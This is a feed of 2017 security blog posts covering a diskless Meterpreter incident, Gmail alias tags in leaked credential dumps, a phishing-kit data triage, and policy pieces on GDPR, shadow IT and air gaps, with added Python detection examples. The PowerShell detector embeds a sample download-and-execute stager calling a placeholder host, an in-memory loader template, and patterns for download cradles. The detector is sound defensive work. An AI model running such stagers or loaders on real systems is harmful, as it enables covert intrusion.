Analysis of the payload returned from this internet resource revealed that the attacker was establishing a reverse shell and loading the Metasploit Meterpreter, a popular penetration testing tool. However, the Meterpreter code was never written to disk as a file: it was diskless, loaded only from an external site, which made detection within the customer environment difficult.
Microsoft ETD analysts quickly analyzed the event, determined it was malicious, and informed the organization of the nature of the attack, providing them with actionable intelligence. This specific actionable intelligence included indicators of attack that can be used to analyze additional data such as proxy logs, to determine if this activity was still ongoing and/or impacting other machines in their environment.
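The case above turns on a PowerShell command line carrying a base64 payload that is decoded and loaded in memory. The following Python is an added example (not Microsoft's code) of how a defender can triage such launches from process-creation telemetry: it decodes the -EncodedCommand switch (UTF-16LE under base64), looks inside any nested FromBase64String blob, and reports which in-memory loading hints matched. The log events, script strings and the opaque byte blob are all constructed here.

```python
"""Decode PowerShell -EncodedCommand launches found in process-creation logs
and flag hints of in-memory ("diskless") payload loading.

Added example, not Microsoft's code.  The log records below are constructed;
a real pipeline would feed it Sysmon Event ID 1 or Security 4688 command lines.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand, so -e, -ec and
# -enc are all valid spellings and all show up in telemetry.
ENCODED_SWITCH = re.compile(
    r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Inner blobs handed to [Convert]::FromBase64String(...)
INNER_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)",
                       re.IGNORECASE)
# Text fragments that suggest code being fetched or loaded without touching
# disk.  Each one is a triage hint, not proof of malice by itself.
INDICATORS = {
    "download-cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadData", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "reflective-load": re.compile(r"Reflection\.Assembly\]::Load|VirtualAlloc", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "nested-base64": re.compile(r"FromBase64String", re.I),
}


def encode_command(script: str) -> str:
    """Build the -EncodedCommand form (base64 over UTF-16LE); used here only
    to construct the sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> Optional[str]:
    """Inverse of encode_command; None when the blob is not base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def _is_text(s: str) -> bool:
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def describe_inner_blob(blob: str) -> str:
    """Return the text inside a FromBase64String blob if it is text, otherwise
    a short description: an assembly or shellcode would land in this branch."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return "<invalid base64>"
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if _is_text(text):
            return text
    return f"<binary blob, {len(raw)} bytes>"


def analyze_command_line(cmdline: str) -> Dict[str, object]:
    """Scan the raw command line, the decoded script and any inner blob."""
    texts: List[str] = [cmdline]
    decoded: Optional[str] = None
    m = ENCODED_SWITCH.search(cmdline)
    if m:
        decoded = decode_command(m.group(1))
        if decoded is not None:
            texts.append(decoded)
    inner: List[str] = []
    for t in list(texts):
        for blob in INNER_B64.findall(t):
            desc = describe_inner_blob(blob)
            inner.append(desc)
            texts.append(desc)  # text payloads get scanned as well
    hits = {name for name, rx in INDICATORS.items()
            if any(rx.search(t) for t in texts)}
    if any(d.startswith("<binary blob") for d in inner):
        hits.add("binary-payload-in-memory")
    return {"decoded": decoded, "inner": inner, "indicators": sorted(hits)}


def triage(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Keep only the events that raised at least one indicator."""
    out = []
    for ev in events:
        res = analyze_command_line(str(ev["cmdline"]))
        if res["indicators"]:
            out.append({"id": ev["id"], **res})
    return out


# --- constructed sample events (not real telemetry) -------------------------
STAGER_SCRIPT = ("$c = New-Object Net.WebClient; "
                 "IEX $c.DownloadString('http://stager.example.invalid/p')")
# Opaque bytes stand in for an in-memory payload; nothing executable here.
OPAQUE_BLOB = base64.b64encode(bytes(range(256))).decode("ascii")
LOADER_SCRIPT = (f"$b = [Convert]::FromBase64String('{OPAQUE_BLOB}'); "
                 "[Reflection.Assembly]::Load($b)")
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"id": 1, "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    {"id": 2, "cmdline": "powershell.exe -NoP -W Hidden -enc " + encode_command(STAGER_SCRIPT)},
    {"id": 3, "cmdline": "powershell.exe -EncodedCommand " + encode_command(LOADER_SCRIPT)},
    {"id": 4, "cmdline": "powershell.exe -ExecutionPolicy Bypass -Command Get-Date"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["id"], hit["indicators"], (hit["decoded"] or "")[:60])
```

Indicator matches are a reason to pull the process memory or proxy logs for that host, not a verdict; legitimate automation also uses encoded commands.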
In conclusion, organizations need to be aware of this type of malicious behavior becoming more prevalent in cybercrime. Microsoft has many insights and tools for enterprises to help keep their environments protected. For information about Enterprise Threat Detection services, contact your Microsoft Account Team or email firstname.lastname@example.org.
from Microsoft Secure Blog Staff
For years, Google has offered two nice features on its gmail.com platform that give you more control over your email address. You can play with the “+” (plus) sign or the “.” (dot) to create more email addresses linked to your primary one. Let’s take an example with John, who is the owner of email@example.com. John can share the email address “firstname.lastname@example.org” with his friends playing soccer or “email@example.com” to register on forums talking about information security. It’s the same with dots: Google just ignores them, so “firstname.lastname@example.org” is the same as “email@example.com”. Many people use the “+” format to manage the flood of email they receive every day and automatically process it or store it in separate folders. That’s nice, but it can also be very useful to discover where an email address is being used.
A few days ago, Troy Hunt, the owner of haveibeenpwned.com service (if you don’t know it yet, just have a look and register!), announced that new massive dumps were in the wild for a total of ~1B passwords! The new dumps are called “Exploit.In” (593M entries) and “Anti Public Combo List” (427M entries). The sources of the leaks are not clear. I grabbed a copy of the data and searched for Google “+” email addresses.
Not surprisingly, I found more than 28K unique accounts! I extracted the strings after the “+” sign and indexed everything in Splunk:
As you can see, we recognise some known online services:
- xtube (adult content)
- friendster (social network)
- filesavr (file exchange service in the cloud)
- linkedin (social network)
- bioware (gaming platform)
This does not mean that those platforms were breached (ok, LinkedIn was) but it can give some indicators…
Here is a dump of the top identified tags (with more than 3 characters to keep the list useful). You can download the complete CSV here.
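The extraction described above (strings after the “+”, counted per unique account), as an added Python example that is not part of the original post. It collapses Gmail aliases to one canonical mailbox (dots and “+tag” ignored), drops tags of three characters or fewer as the post does, and runs on a constructed email:password sample rather than dump data.

```python
"""Extract Gmail "+tag" labels from a constructed credential-dump sample and
count how many distinct accounts use each tag.

Added example, not the post's own Splunk queries.  The dump lines are
constructed; real combo lists come as email:password, one per line.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Optional, Tuple

GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}
EMAIL_RE = re.compile(r"^([^@\s:]+)@([^@\s:]+)$")


def split_gmail(addr: str) -> Optional[Tuple[str, Optional[str]]]:
    """Return (canonical local part, tag) for a Gmail address, else None.
    Gmail ignores dots and everything from the first '+' in the local part."""
    m = EMAIL_RE.match(addr.strip().lower())
    if not m:
        return None
    local, domain = m.groups()
    if domain not in GMAIL_DOMAINS:
        return None
    base, plus, tag = local.partition("+")
    return base.replace(".", ""), (tag if plus else None)


def canonical(addr: str) -> Optional[str]:
    """Collapse all aliases of one mailbox to a single key."""
    parsed = split_gmail(addr)
    return None if parsed is None else parsed[0] + "@gmail.com"


def tag_report(lines: Iterable[str], min_tag_len: int = 4) -> Dict[str, List[str]]:
    """tag -> sorted canonical accounts using it; tags shorter than
    min_tag_len (the post keeps tags of more than 3 characters) are dropped."""
    by_tag = defaultdict(set)
    for line in lines:
        email = line.split(":", 1)[0]      # email:password layout
        parsed = split_gmail(email)
        if parsed is None:
            continue                       # not Gmail, or not an address at all
        base, tag = parsed
        if tag and len(tag) >= min_tag_len:
            by_tag[tag].add(base + "@gmail.com")
    return {tag: sorted(accts) for tag, accts in by_tag.items()}


def top_tags(lines: Iterable[str], n: int = 10) -> List[Tuple[str, int]]:
    """Most-used tags by number of distinct accounts, not raw lines."""
    counts = Counter({tag: len(a) for tag, a in tag_report(lines).items()})
    return counts.most_common(n)


# Constructed sample (fake mailboxes and passwords), not dump data.
SAMPLE_DUMP = [
    "john.doe+linkedin@gmail.com:pw1",
    "JohnDoe+LinkedIn@gmail.com:pw2",               # same mailbox, same tag
    "j.o.h.n.d.o.e+friendster@googlemail.com:pw3",  # still the same mailbox
    "alice+linkedin@gmail.com:pw4",
    "alice+xtube@gmail.com:pw5",
    "bob+ab@gmail.com:pw6",                         # tag too short, dropped
    "carol@gmail.com:pw7",                          # no tag
    "dave+linkedin@example.org:pw8",                # not Gmail, skipped
    "garbage line without an address",
    "",
]

if __name__ == "__main__":
    for tag, count in top_tags(SAMPLE_DUMP):
        print(f"{count:4d}  {tag}")
```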
[The post Identifying Sources of Leaks with the Gmail “+” Feature has been first published on /dev/random]
Tuesday, May 9, 2017
This post is authored by Daniel Grabski, Executive Security Advisor, Enterprise Cybersecurity Group.
As an Executive Security Advisor for the Central and Eastern European region, I engage every day with Chief Information Security Officers (CISOs) to learn their thoughts and concerns. One very hot topic raised at nearly every meeting, conference or seminar I attend with customers and partners, regards the General Data Protection Regulation or GDPR. In essence, the GDPR is fundamentally about protecting and enabling the privacy rights of individuals. It establishes strict global privacy requirements governing how you manage and protect personal data while respecting individual choice – no matter where data is sent, processed, or stored.
Without a doubt, GDPR is one of the biggest changes coming to European Union privacy laws in recent years. It is a complex regulation that may require significant changes for every company that:
- Is established in the EU.
- Sells goods or services in the EU.
- Monitors and processes data of those in the EU, regardless of where that processing and monitoring takes place.
The GDPR requirements may also cover the technology used within organizations, as well as the relevant people and processes that need to be in place to manage all the stages. Even once the GDPR is enforced as of 25 May 2018, compliance will be an ongoing process.
In this post, in order to help answer the most common questions I hear from CISOs, I will briefly address the following:
- What does Microsoft’s journey to GDPR compliance look like?
- What can I do today?
- What is the role of my cloud provider?
- How can technology help me with compliance?
What does Microsoft’s journey to GDPR compliance look like?
Microsoft wears many hats under the GDPR: we offer consumer services for which we are a controller, we offer enterprise online services for which we are a processor, and setting aside our role as a technology company, we are an international company with a global employee base. This means that we are going through the same journey as your organization and are innovating to make GDPR compliance simpler for our customers by May 2018. As stated in a recent blog post by Brendon Lynch, Chief Privacy Officer at Microsoft, “To simplify your path to compliance, Microsoft is committing to be GDPR compliant across our cloud services when enforcement begins on May 25, 2018. We have also committed to share our experience complying with complex regulations, to help you craft the best path forward for your organization to meet the privacy requirements of the GDPR.”
You can read and observe the Microsoft journey to GDPR compliance and recommendations via our website and the Get GDPR compliant with the Microsoft Cloud blog. On the website, you will find a whitepaper which describes how Microsoft enterprise products and cloud services can help you to be ready for GDPR.
From my discussions with customers and partners, I can attest that many are keenly aware of GDPR requirements. However, awareness and readiness currently span a large divide. About one third have not yet begun the journey, another third is just beginning the process, and the final third are actively working to map GDPR requirements to their current processes and technology stack.
GDPR is not only the responsibility of the Chief Information Security Officer or Data Privacy Officer, but of the entire C-suite. It is not just about the application of technology; it is important to consider the processes involved and align them to the new regulation. Last, but not least, it is also a topic that every employee should be aware of, from the executive level to operations. It is of paramount importance to provide proper awareness and training across the company, emphasizing the importance of GDPR, its impact on company operations and the consequences of not complying with GDPR requirements. Therefore, becoming GDPR compliant includes the full scope of alignment of people, processes and technology.
What can I do today?
We recommend you begin your journey to GDPR compliance by focusing on four key steps (see Figure 1 below):
- Discover—identify what personal data you have and where it resides. This is fundamental to any good risk management practice, and is critical with the GDPR as one can only protect and manage data, as required by the GDPR, when the data is identified.
- Manage— execute on data subject requests, govern how personal data is used and accessed. Make sure that data is only used for the purposes it was intended for and accessible only to those with a need to access it.
- Protect—establish security controls to prevent, detect, and respond to vulnerabilities and data breaches. By properly securing your data across its lifecycle, you will reduce the risk of a breach occurring. Knowing when and if a breach occurs can help you keep the data protection authority informed.
- Report—report data breaches, and keep required documentation. Proving you are governing data in the right way and successfully handling data subject requests is the core of compliance.
Figure 1: Four steps to GDPR compliance
The Beginning your GDPR Journey whitepaper provides more details on the steps and the technologies available today to help you.
What is the role of my cloud provider?
This is a common question I hear from CISOs looking across their complex environments, as they try to understand what role their cloud provider plays in addressing the requirements of the GDPR. The GDPR requires that controllers only use processors that have committed to comply with the GDPR and to support the compliance efforts of controllers. Microsoft is the first major cloud service provider to make this commitment. That means Microsoft will meet the stringent security requirements of GDPR.
Fundamentally, GDPR is also about shared responsibility and trust. It requires a cloud service provider with a principled approach to privacy, security, compliance and transparency, such as Microsoft. Trust can be viewed from many different angles, including how the provider secures its own, and its customers’, infrastructure to manage cybersecurity risks. How is data protected? What mechanisms and principles are driving the approaches and practices in this very sensitive area?
Microsoft invests $1 billion per year to protect, detect and respond to security incidents, within the company, and on behalf of customers and the millions of victims of cybercrime around the globe. In November 2015 we announced the Microsoft Cyber Defense Operations Center (CDOC). This facility brings together security experts from across the company to help protect, detect and respond to cyber threats in real-time. CDOC dedicated teams operate 24×7, and the center has direct access to thousands of security professionals, data analysts and scientists, engineers, developers, program managers, and operations specialists throughout the Microsoft global network. This ensures rapid detection, response and resolution to security threats.
Figure 2: Cyber Defense Operations Center (CDOC)
Microsoft openly shares how we protect our own and our customers’ infrastructures. Read more about best practices used in the Cyber Defense Operations Center. The CDOC also leverages the power of the cloud through the Microsoft Intelligent Security Graph (ISG).
Every second of every day, we add hundreds of gigabytes worth of telemetry to the Security Graph. This anonymized data is coming from:
- hundreds of global cloud services, both consumer and commercial
- data about cyber threats faced by the +1 billion PCs we update via Windows Update every month
- external data points we collect through extensive research, partnership with industry and law enforcement through the Microsoft Digital Crimes Unit
To give you a visual of what that means, we add to the Security Graph with data from the 300 billion monthly authentications across our consumer and enterprise services, as well as the 200 billion e-mails that are analyzed each month for malware and malicious websites.
Imagine all of this data coming together in one place. Think of how the insight that provides can help to anticipate and defeat attacks, protecting your organization. As you can see in Figure 3, we analyze feedback, malware, spam, authentications, and attacks. For example, data from millions of Xbox Live devices show how they are being attacked, and we learn how to apply that to better protect our customers. Much is incorporated through machine learning and data scientist analysis to better understand the newest techniques of cyber attacks.
In addition to the CDOC, the Digital Crimes Unit and the Intelligent Security Graph, Microsoft also created a dedicated team of enterprise cybersecurity professionals to help move you securely to the Cloud and protect your data. These are just a few examples of the continuous investments Microsoft makes in cybersecurity, that are crucial to create products and services that support your compliance with the GDPR.
How can technology help me with compliance?
Fortunately, there are many technology solutions to help with GDPR compliance. Two of my favorites are Microsoft Azure Information Protection (AIP) and Advanced Threat Protection (ATP) in Exchange Online. AIP ensures your data is identifiable and secure, a key requirement of GDPR – regardless of where it’s stored or how it’s shared. With AIP you can instantly get to work on Steps 1 & 2 mentioned above, to classify, label and protect new or existing data, to share it securely with people within or outside of your organization, to track usage, and even to revoke access remotely. It is intuitive, easy to use and a powerful solution that also includes rich logging and reporting to monitor the distribution of data, and options to manage and control your encryption keys.
When you are ready for step 3 in your GDPR compliance journey, Advanced Threat Protection (ATP) addresses the core requirement of GDPR to protect the personal data of individuals against security threats. Office 365 includes features that safeguard data and identify when a data breach occurs. One such feature is Advanced Threat Protection (ATP) in Exchange Online Protection that helps protect email against new, sophisticated malware attacks in real time. ATP also provides a way to create policies that prevent users from accessing malicious email attachments or malicious websites linked through emails. For example, with the Safe Attachments feature you can prevent malicious attachments from impacting your messaging environment, even if their signatures are not known. All suspicious content goes through a real-time behavioral malware analysis that uses machine learning techniques to evaluate the content for suspicious activity. Unsafe attachments are sandboxed in a detonation chamber before being sent to recipients.
A recent issue of the Economist explained, “How to manage the computer security threat.” Their top recommendation was that both government and product regulations must lead the way. Without a doubt GDPR needs to be seriously addressed as a top priority on the agenda of every CISO now and beyond May 2018. This is a continuous commitment to security and privacy. By becoming more regulated through GDPR, providing a framework to better protect personal data, and giving tools to implement security controls for protecting, detecting and responding to threats, we will fight our best fight against cyber crime. Microsoft stands ready to work with CISOs to raise awareness, empower and ensure access to the resources available now and in the future.
Learn more about Microsoft GDPR and general security with these helpful resources:
- GDPR resources
- GDPR “Beginning your GDPR Journey” whitepaper
- Executive Support: Learn more about the Enterprise Cybersecurity Group, or contact your local Microsoft representative.
- Blogs: Microsoft Secure Blog and Microsoft On the Issues
- Learn more about the Microsoft Enterprise Cloud
- Read the Microsoft Security Intelligence Report
- Follow us on Twitter: @MSFTSecurity
About the author:
Daniel Grabski is a 20-year veteran of the IT industry, currently serving as an Executive Security Advisor for Europe, Middle East and Africa time zone in the Enterprise Cybersecurity Group at Microsoft. In this role, he focuses on enterprise, partners, public sector customers and critical security stakeholders. Daniel delivers strategic security expertise and advice around cybersecurity solutions and services which are needed to build and maintain secure and resilient ICT infrastructure.
from Microsoft Secure Blog Staff
Monday, May 8, 2017
Over 80 percent of employees admit to using non-approved SaaS applications in their jobs, and for the most part they have well-intentioned reasons for adopting them. Many report wanting to use software they are familiar with, that is cheaper, quicker to deploy, and better meets their needs than the IT-approved equivalent. This isn’t just about personal preference. It allows employees to skip the learning curve of new software and enables the business to move more quickly.
Empowering employees to find creative solutions to business problems and enabling easy access to the tools they need are key to driving innovation and productivity.
Flexibility to use preferred tools can also help attract the next generation of talent. Younger workers have grown up using the apps and devices they want to get things done in the way that works for them. Nearly 50% prefer tools like chat and messaging, and they are twice as likely as boomers to prefer meeting online versus in person. While the urge to block Shadow IT is understandable, it may signal to new employees that your company culture isn’t open to the new and innovative solutions that often characterize successful businesses.
IT should look for solutions that give employees the freedom to choose the apps they want, while still ensuring the security and compliance your organization demands. One of those solutions is to use a Cloud Access Security Broker.
Empower your workforce with a Cloud Access Security Broker (CASB)
CASB solutions give you a detailed picture of the cloud apps your employees use and help you to monitor and manage them effectively.
A good CASB solution discovers which cloud apps are in use and brings them together into a single interface. Each app is then rated for risk based on industry standards and best practices, so you can easily scan and set policies for how users interact with each app. A good CASB solution can also help protect those apps from advanced security threats.
With better visibility, control, and protection over your Shadow IT, you can help empower greater productivity and manage your security risk. Curious to learn more? Check out our new e-book: Bring Shadow IT into the Light.
from Microsoft Secure Blog Staff
Saturday, May 6, 2017
I published the following diary on isc.sans.org: “The story of the CFO and CEO…“.
I read an interesting article in a Belgian IT magazine. Every year, they organise a big survey to collect feelings from people working in the IT field (not only security). It is very broad and covers their salary, work environments, expectations, etc. For infosec people, one of the key points was that people wanted to attend more trainings and conferences… [Read more]
Friday, May 5, 2017
I published the following diary on isc.sans.org: “HTTP Headers… the Achilles’ heel of many applications“.
When browsing a target web application, a pentester is looking for all “entry” or “injection” points present in the pages. Everybody knows that a static website with pure HTML code is less juicy compared to a website with many forms and gadgets where visitors may interact with it. Classic vulnerabilities (XSS, SQLi) are based on the user input that is abused to send unexpected data to the server… [Read more]
[The post [SANS ISC] HTTP Headers… the Achilles’ heel of many applications has been first published on /dev/random]
Wednesday, May 3, 2017
In 2005, just over a decade ago, the majority of large internet user populations, certainly as a percentage of their total national population, were still to be found in North America and Europe. In 2025, less than a decade from now, many of the largest internet user populations will be in Asia. Asia will be a fulcrum of cyberspace and it will also be, inevitably, a fulcrum of both cybercrime and cybersecurity. As such, cybersecurity policy decisions being made today in Asia will significantly shape cyberspace in 2025 and beyond. Given the interconnected nature of cyberspace, their impact will be global.
While many analysts focus on Asia’s large political and economic players, such as Tokyo and Beijing, I will take a look at Singapore, whose smaller size has allowed it to be agile and power ahead in terms of online innovation. It is clear that the government realized that technology is central to both the country’s current economic success and its future prospects. Not only has it strived to make Singapore a hub for industries highly reliant on technology, such as financial services, it has focused its investments to ensure the country can become a true “Smart Nation”. That has meant being bold in adopting new technologies and, on occasion, facilitating experimentation, for example through the recently outlined “big data sandbox” initiative.
Moreover, Singapore has also realized that it can only be successful in this space if it can adopt technology securely. Its approach, which is to give clear guidance to key parts of the economy and to cooperate closely with the private sector to help create, refine and enact that guidance with an eye to ensuring future innovation, is a worthwhile example for other Asian governments. Its early push in ensuring key industry sectors can move to the cloud securely through the adoption of the Multi-Tier Cloud Security standard has been followed by complementary initiatives, such as the Cloud Implementation Guide developed by the Association of Banks in Singapore (ABS). Central to the success of both documents has been a close partnership with those they were intended to guide, i.e. both cloud providers and those adopting new technologies. This mirrors the positive model of public-private engagement that underpinned the successful NIST Cybersecurity Framework in the United States.
More recently, the Singaporean Cybersecurity Agency (CSA) has made cybersecurity even more of a priority for the country. The Cybersecurity Strategy, launched in October 2016, aims to build a resilient and trusted cyber environment by focusing on four pillars: i) Building a Resilient Infrastructure; ii) Creating a Safe Cyberspace; iii) Developing a Vibrant Cybersecurity Ecosystem; and iv) Strengthening International Partnerships. First outcomes can already be seen, with the revised Cybercrime Act adopted in April.
Moreover, the government has already begun consultations on its Cybersecurity Act, which we expect to be introduced by the end of the year. It will be interesting to observe whether Singapore follows models that have been put forward by the above-mentioned NIST Cybersecurity Framework, or takes an approach closer to that put forward by the European Union with the Network and Information Security Directive. On the other hand, it could put forward its own model. After all, frameworks for protecting critical infrastructure online are evolving. Countries are debating the benefits of regulatory vs. voluntary approaches, struggling to balance information sharing and incident reporting, and managing the role of regulators in an area that cuts across typical boundaries between industry sectors.
Singapore is not, however, only looking inwards. It is making an active contribution to regional cybersecurity, having launched an ASEAN Cyber Capacity Program (ACCP). As well as capacity-building activities, developing technical skills, and incident response capabilities, the ACCP will support discussion and consultancy work in areas such as the creation of national cybersecurity agencies, cybersecurity strategies, and even cybersecurity legislation. This initiative highlights an important understanding: that in an interconnected world, an individual, organisation or state is only as safe in cyberspace as its weakest link.
Although I remain concerned that Singapore’s approach to network separation could create problems for government, business and citizens, what distinguishes Singapore’s approach, overall, is its determination to tackle cybersecurity without cutting off its connections to the region and the world. Perhaps for an island nation that depends upon commerce the logic of putting up barriers is particularly inimical, but it nonetheless demonstrates that it can be done: governments can build cybersecurity without harming openness and innovation. Looking at Singapore, I would hope that other governments, not just in Asia but around the world, can see that infrastructure, businesses and citizens can all be protected without the loss of the interconnectedness and opportunities of cyberspace.
from Paul Nicholas
A study was just released by cyber security firm Neustar Security that confirms the fear of many IT professionals and executives in big and small organizations alike. DDoS attacks are rapidly increasing in number and they are becoming more and more powerful.
The firm’s head of research and development fears that many companies have not taken enough precautions to prevent DDoS attacks. His company is trying its best to spread awareness of DDoS by releasing statistical data about how damaging these attacks can be. If your organization isn’t prepared, you’ll face massive losses.
The post A DDoS tsunami is coming to cost companies in millions appeared first on Cyber Security Portal.
from Gilbertine Onfroi
Tuesday, May 2, 2017
Today, while hunting, I found a malicious HTML page in my spam trap. The page was a fake JP Morgan Chase bank page. Nothing fancy. When I find such material, I usually search for “POST” HTTP requests to collect URLs and visit the websites that receive the victims’ data. As usual, the website was not properly protected and all files were readable. This one looked interesting:
The first question was: are those data relevant? Probably not… Why?
Today, many attackers protect their malicious website via an .htaccess file to restrict access to their victims only. In this case, Chase bank being based in the US, we could expect most of the visitors’ IP addresses to be geolocated there, but it was not the case this time. I downloaded the data file, which contained 503 records. Indeed, most of them contained empty or irrelevant information. So I decided to have a look at the IP addresses. Who’s visiting the phishing site? Let’s generate some statistics!
$ grep ^ip: data.txt | cut -d ' ' -f 2 | sort -u > victims.csv
$ wc -l victims.csv
150
With Splunk, we can easily display them on a fancy map:
| inputlookup victims.csv
| iplocation IP
| stats count by IP, lat, lon, City, Country, Region
Here is the top-5 of countries which visited the phishing page or, more precisely, which submitted a POST request:
Some IP addresses visited the website multiple times:
A reverse lookup on the IP addresses revealed some interesting information:
- The Google App Engine was the top visitor
- Many VPS providers visited the page, probably from hosts owned by researchers (OVH, Amazon EC2)
- Services protecting against phishing sites visited the page (ex: phishtank.com, phishmongers.com, isitphishing.org)
- Many Tor exit-nodes
- Some online URL scanners (urlscan.io)
- Some CERTS (CIRCL)
Two nice names were found:
No real victim left his/her data on the fake website. Some records contained data, but fake data (although probably entered manually). All the traffic was generated by crawlers, bots and security tools…
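The triage above (dedupe the submitting IPs, count repeat visitors, classify them by reverse DNS, and separate junk submissions from plausible ones), as an added Python example that is not part of the original post. The record layout with user:/pass: lines, the reverse-DNS table and the category rules are constructed assumptions; the only thing the post shows about the real file is its “ip:” lines.

```python
"""Triage the data file a phishing kit writes for each submitted form, to see
whether the "victims" are real.

Added example, not the post's own commands.  The record layout (one record per
block of key: value lines) and the reverse-DNS table are constructed here; the
real kit's file is only known to carry the "ip:" lines the post greps for.
"""
from collections import Counter
from typing import Dict, List

# Category rules keyed on reverse-DNS name fragments (constructed list).
RDNS_RULES = [
    ("googleusercontent.com", "Google App Engine / GCP"),
    ("amazonaws.com", "Amazon EC2"),
    ("ovh.net", "OVH"),
    ("tor-exit", "Tor exit node"),
    ("phishtank", "anti-phishing service"),
]
# Values people type when they are probing a form rather than logging in.
JUNK_VALUES = {"test", "asdf", "admin", "qwerty", "aaaa", "none"}


def parse_records(text: str) -> List[Dict[str, str]]:
    """Split the file into records separated by '----' lines."""
    records, current = [], {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("----"):
            if current:
                records.append(current)
            current = {}
        elif ":" in line:
            key, value = line.split(":", 1)
            current[key.strip().lower()] = value.strip()
    if current:
        records.append(current)
    return records


def is_plausible(rec: Dict[str, str]) -> bool:
    """Empty or obviously typed-in junk does not count as a real victim."""
    user, pwd = rec.get("user", ""), rec.get("pass", "")
    if len(user) < 3 or len(pwd) < 3:
        return False
    return user.lower() not in JUNK_VALUES and pwd.lower() not in JUNK_VALUES


def classify_ip(ip: str, rdns: Dict[str, str]) -> str:
    """Map an IP to a visitor category via its (pre-resolved) PTR name."""
    name = rdns.get(ip)
    if name is None:
        return "unknown (no PTR)"
    for fragment, label in RDNS_RULES:
        if fragment in name.lower():
            return label
    return "other"


def summarize(records: List[Dict[str, str]], rdns: Dict[str, str]) -> Dict[str, object]:
    ips = [r["ip"] for r in records if r.get("ip")]
    visits = Counter(ips)
    categories = Counter(classify_ip(ip, rdns) for ip in visits)  # per unique IP
    return {
        "records": len(records),
        "unique_ips": len(visits),
        "repeat_visitors": {ip: n for ip, n in visits.items() if n > 1},
        "plausible": sum(1 for r in records if is_plausible(r)),
        "by_category": dict(categories),
    }


# Constructed sample in the assumed layout (documentation-range IPs only).
SAMPLE_DATA = """\
ip: 192.0.2.10
user:
pass:
----
ip: 192.0.2.10
user: test
pass: test
----
ip: 198.51.100.7
user: asdf
pass: asdf
----
ip: 203.0.113.42
user: jdoe
pass: Winter2017!
----
ip: 203.0.113.99
user:
pass:
"""
# Constructed PTR answers; a real run would resolve them with the resolver.
SAMPLE_RDNS = {
    "192.0.2.10": "10.2.0.192.bc.googleusercontent.com",
    "198.51.100.7": "ec2-198-51-100-7.compute-1.amazonaws.com",
    "203.0.113.42": "tor-exit-42.relay.example",
}

if __name__ == "__main__":
    for key, value in summarize(parse_records(SAMPLE_DATA), SAMPLE_RDNS).items():
        print(f"{key}: {value}")
```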
Monday, May 1, 2017
In some of my recent discussions with policy-makers, network separation, i.e. the physical isolation of sensitive networks from the Internet, has been floated as an essential cybersecurity tool. Why? It promises the holy grail of security, i.e. 100% protection, because cyberattacks can’t cross the “air gap” to reach their target.
In my experience, however, network separation has its place in the governments’ cybersecurity toolkit but it also suffers from significant drawbacks. These include: costs of implementation and maintenance; diminished productivity; and, perhaps counterintuitively, degradation in some key aspects of security. Overall, network separation is out of step with a world where systems’ interconnectivity is underpinning innovation driven by cloud computing and the Internet of Things (IoT). I’m going to use this blog to look a little more closely at these issues.
Network separation is an established and recognized security practice in critical sectors, e.g. classified military networks or nuclear power plants. The potential consequences of these systems being compromised are sufficiently bad to justify any downsides that network separation might introduce. However, as governments consider implementing network separation more broadly, that cost/benefit calculation must change.
Looking at costs alone, creating separate networks means increased expenditure of limited resources and reduced economies of scale. An “air gap” demands creating a whole new network with standalone servers, routers, switches, management tools, etc. That network needs to be built to deliver the foreseeable peak demand, which might only occur every now and then. This largely unused capacity is effectively wasted, whereas a non-separated network could simply use temporary cloud resources to “scale up” when needed. Costs increase further because software maintenance cannot be done by a remote centralized hub, whilst physical maintenance is more time consuming.
Network separation can also harm efficiency, productivity and usability. An “air gap” creates barriers to the outside world, which most government workers need to best serve their constituencies. Having to turn attention and move information between different devices, some separated and some not, would be time consuming at best and confusing at worst. And many government services and systems that are meant to interact directly with citizens are likely to be slowed and made more cumbersome by separation protocols. The benefits of smart cities and smart nations will be significantly diminished if governments forsake cloud and IoT benefits in the name of network separation.
Finally, even network separation’s security benefits are not foolproof. For one thing, being disconnected from threats frequently means being disconnected from cybersecurity innovation, let alone mundane security tools such as patches. Moreover, the assumption of being safe on the other side of an “air gap” can mean staff and management take essential security basics for granted. Indeed, a poor cybersecurity culture within any organization means social engineering or human error can give malicious actors a way into a system, e.g. as employees circumvent cumbersome requirements by relying on their private (and often insecure) email.
Furthermore, the “air gap” itself can be circumvented. Just one connection with the outside world creates a single point of failure for malicious actors to exploit and even with no direct connection there are ways “in”. As Stuxnet showed, removable media such as USB drives can insert malware into physically separated hardware, whilst some forms of hacking are able to “jump” the “air-gap”, e.g. USBee (a “software-only method for short-range data exfiltration using electromagnetic emissions from a USB dongle”) and AirHopper (turns a computer’s video card into an FM transmitter to collect data from “air-gapped” devices).
For governments concerned about the growing scale, frequency, sophistication and impact of cyberattacks there can be legitimate reasons for adopting network separation. In limited sets of circumstances, e.g. protecting classified networks, it can be part of an appropriate, risk-management based cybersecurity response. That being said, it is essential for governments to understand the tradeoffs in cost, usability, and effectiveness that the approach introduces. Network separation is not and cannot be the right or the only answer to all of their cybersecurity concerns.
from Paul Nicholas